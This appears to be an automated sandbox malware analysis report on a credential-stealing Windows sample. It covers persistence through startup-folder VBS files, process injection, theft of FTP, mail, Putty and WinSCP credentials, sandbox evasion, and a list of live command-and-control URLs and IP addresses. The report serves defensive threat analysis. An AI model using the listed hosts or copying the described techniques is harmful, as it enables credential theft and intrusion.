                Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: palladiums.exeBinary or memory string: WIN_81
                Source: palladiums.exeBinary or memory string: WIN_XP
                Source: palladiums.exe, 00000023.00000002.2384224017.00000000000F2000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: palladiums.exeBinary or memory string: WIN_XPe
                Source: palladiums.exeBinary or memory string: WIN_VISTA
                Source: palladiums.exeBinary or memory string: WIN_7
                Source: palladiums.exeBinary or memory string: WIN_8
                Source: Yara matchFile source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.palladiums.exe.14d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.palladiums.exe.18f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.palladiums.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.palladiums.exe.1670000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.palladiums.exe.3830000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00791204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00791204
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00791806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00791806
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_000B1204
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_000B1806
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting
                2
                Valid Accounts
                1
                Native API
                111
                Scripting
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Scheduled Task/Job
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol2
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Valid Accounts
                2
                Valid Accounts
                3
                Obfuscated Files or Information
                1
                Credentials in Registry
                2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                Scheduled Task/Job
                21
                Access Token Manipulation
                1
                Software Packing
                NTDS127
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchd2
                Registry Run Keys / Startup Folder
                412
                Process Injection
                1
                DLL Side-Loading
                LSA Secrets431
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Scheduled Task/Job
                1
                Masquerading
                Cached Domain Credentials141
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
                Registry Run Keys / Startup Folder
                2
                Valid Accounts
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                Virtualization/Sandbox Evasion
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
                Process Injection
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585229 Sample: 9876567899.bat.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 74 oshi.at 2->74 88 Suricata IDS alerts for network traffic 2->88 90 Found malware configuration 2->90 92 Malicious sample detected (through community Yara rule) 2->92 94 14 other signatures 2->94 15 9876567899.bat.exe 3 2->15         started        19 wscript.exe 1 2->19         started        signatures3 process4 file5 72 C:\Users\user\AppData\...\palladiums.exe, PE32 15->72 dropped 80 Binary is likely a compiled AutoIt script file 15->80 82 Found API chain indicative of sandbox detection 15->82 21 palladiums.exe 1 15->21         started        84 Windows Scripting host queries suspicious COM object (likely to drop second stage) 19->84 25 palladiums.exe 19->25         started        signatures6 process7 file8 66 C:\Users\user\AppData\...\palladiums.vbs, data 21->66 dropped 108 Multi AV Scanner detection for dropped file 21->108 110 Machine Learning detection for dropped file 21->110 112 Drops VBS files to the startup folder 21->112 116 4 other signatures 21->116 27 svchost.exe 235 21->27         started        114 Binary is likely a compiled AutoIt script file 25->114 32 palladiums.exe 25->32         started        signatures9 process10 dnsIp11 76 172.245.123.11, 49704, 49705, 49706 AS-COLOCROSSINGUS United States 27->76 78 oshi.at 194.15.112.248, 443, 49707, 49713 INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB Ukraine 27->78 68 C:\Users\user\AppData\Roaming\Dhy2kmz.exe, PE32 27->68 dropped 70 C:\Users\user\AppData\Local\...\JOHP[1].exe, PE32 27->70 dropped 124 System process connects to network (likely due to code injection or exploit) 27->124 126 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 27->126 128 Tries to steal Mail credentials (via file / registry access) 27->128 132 2 other signatures 27->132 34 Dhy2kmz.exe 15 4 27->34         started        130 Binary is likely a compiled AutoIt script file 32->130 38 palladiums.exe 32->38         started        file12 signatures13 process14 file15 62 C:\Users\user\AppData\Roaming\Wnuth.exe, PE32 34->62 dropped 64 C:\Users\user\AppData\Roaming\...\Wnuth.vbs, ASCII 34->64 dropped 96 Machine Learning detection for dropped file 34->96 98 Drops VBS files to the startup folder 34->98 100 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 34->100 102 Injects a PE file into a foreign processes 34->102 40 Dhy2kmz.exe 34->40         started        104 Binary is likely a compiled AutoIt script file 38->104 42 palladiums.exe 38->42         started        signatures16 process17 signatures18 45 WerFault.exe 40->45         started        120 Binary is likely a compiled AutoIt script file 42->120 47 palladiums.exe 42->47         started        process19 signatures20 134 Binary is likely a compiled AutoIt script file 47->134 50 palladiums.exe 47->50         started        process21 signatures22 86 Binary is likely a compiled AutoIt script file 50->86 53 palladiums.exe 50->53         started        process23 signatures24 106 Binary is likely a compiled AutoIt script file 53->106 56 palladiums.exe 53->56         started        process25 signatures26 118 Binary is likely a compiled AutoIt script file 56->118 59 palladiums.exe 56->59         started        process27 signatures28 122 Binary is likely a compiled AutoIt script file 59->122

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                9876567899.bat.exe29%VirustotalBrowse
                9876567899.bat.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\preinhered\palladiums.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Dhy2kmz.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\JOHP[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Wnuth.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\preinhered\palladiums.exe29%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://oshi.at/BLZu0%Avira URL Cloudsafe
                http://172.245.123.11/tpm/fre.php100%Avira URL Cloudmalware
                https://oshi.at/rtBS?N0%Avira URL Cloudsafe
                https://oshi.at/BLZuM0%Avira URL Cloudsafe
                https://oshi.at/rtBS0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                oshi.at
                194.15.112.248
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://oshi.at/BLZutrue
                  • Avira URL Cloud: safe
                  unknown
                  http://172.245.123.11/tpm/fre.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://kbfvzoboss.bid/alien/fre.phpfalse
                    high
                    https://oshi.at/rtBS?Ntrue
                    • Avira URL Cloud: safe
                    unknown
                    http://alphastand.top/alien/fre.phpfalse
                      high
                      http://alphastand.win/alien/fre.phpfalse
                        high
                        http://alphastand.trade/alien/fre.phpfalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://github.com/mgravell/protobuf-netiDhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmpfalse
                            high
                            https://stackoverflow.com/q/14436606/23354Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmpfalse
                              high
                              https://github.com/mgravell/protobuf-netJDhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmpfalse
                                high
                                https://oshi.at/rtBSsvchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://stackoverflow.com/q/11564914/23354;Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmpfalse
                                  high
                                  https://stackoverflow.com/q/2152978/23354Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmpfalse
                                    high
                                    http://www.ibsensoftware.com/palladiums.exe, palladiums.exe, 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmpfalse
                                      high
                                      https://oshi.at/BLZuMDhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000000.2085021308.0000000000542000.00000002.00000001.01000000.00000007.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://github.com/mgravell/protobuf-netDhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmpfalse
                                        high
                                        https://oshi.atDhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            194.15.112.248
                                            oshi.atUkraine
                                            213354INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBfalse
                                            172.245.123.11
                                            unknownUnited States
                                            36352AS-COLOCROSSINGUStrue
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1585229
                                            Start date and time:2025-01-07 11:01:05 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 11m 13s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:40
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:9876567899.bat.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.expl.evad.winEXE@99/9@1/2
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 97%
                                            • Number of executed functions: 47
                                            • Number of non-executed functions: 306
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            TimeTypeDescription
                                            05:01:57API Interceptor171x Sleep call for process: svchost.exe modified
                                            05:02:00API Interceptor36x Sleep call for process: Dhy2kmz.exe modified
                                            11:01:57AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs
                                            11:02:10AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wnuth.vbs
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            194.15.112.248Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                              Ref#116670.exeGet hashmaliciousMassLogger RATBrowse
                                                Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                  Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                    KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                      KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                        Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                          uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                            W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                              172.245.123.11e2VMPAayU1.rtfGet hashmaliciousUnknownBrowse
                                                              • 172.245.123.11/46/seethemoononlinetoseebeautygirl.gIF
                                                              Purchase Order.xlsGet hashmaliciousUnknownBrowse
                                                              • 172.245.123.11/46/seethemoononlinetoseebeautygirl.gIF
                                                              4vzwJTZbwT.rtfGet hashmaliciousRemcosBrowse
                                                              • 172.245.123.11/47/BEN.txt
                                                              PI-002312.xlsGet hashmaliciousRemcosBrowse
                                                              • 172.245.123.11/47/BEN.txt
                                                              BilseMHALF.rtfGet hashmaliciousUnknownBrowse
                                                              • 172.245.123.11/90290/somethingnewthingsareupmeforgirls.gIF
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              oshi.atRef#66001032.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 5.253.86.15
                                                              Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 5.253.86.15
                                                              Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                                              • 5.253.86.15
                                                              Ref#116670.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 194.15.112.248
                                                              Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 194.15.112.248
                                                              Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 194.15.112.248
                                                              Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                              • 5.253.86.15
                                                              Swift Payment MT103.lnkGet hashmaliciousUnknownBrowse
                                                              • 188.241.120.6
                                                              Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                              • 188.241.120.6
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBRef_31020563.exeGet hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              Ref#116670.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 194.15.112.248
                                                              Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 194.15.112.248
                                                              Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 194.15.112.248
                                                              KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                              • 194.15.112.248
                                                              uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                              • 194.15.112.248
                                                              W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                              • 194.15.112.248
                                                              1pXdiCesZ6.exeGet hashmaliciousDanaBotBrowse
                                                              • 194.15.112.203
                                                              AS-COLOCROSSINGUSarm5.elfGet hashmaliciousUnknownBrowse
                                                              • 104.168.33.8
                                                              mips.elfGet hashmaliciousUnknownBrowse
                                                              • 104.168.33.8
                                                              mpsl.elfGet hashmaliciousUnknownBrowse
                                                              • 104.168.33.8
                                                              sh4.elfGet hashmaliciousUnknownBrowse
                                                              • 107.175.130.16
                                                              x86_64.elfGet hashmaliciousUnknownBrowse
                                                              • 104.168.33.8
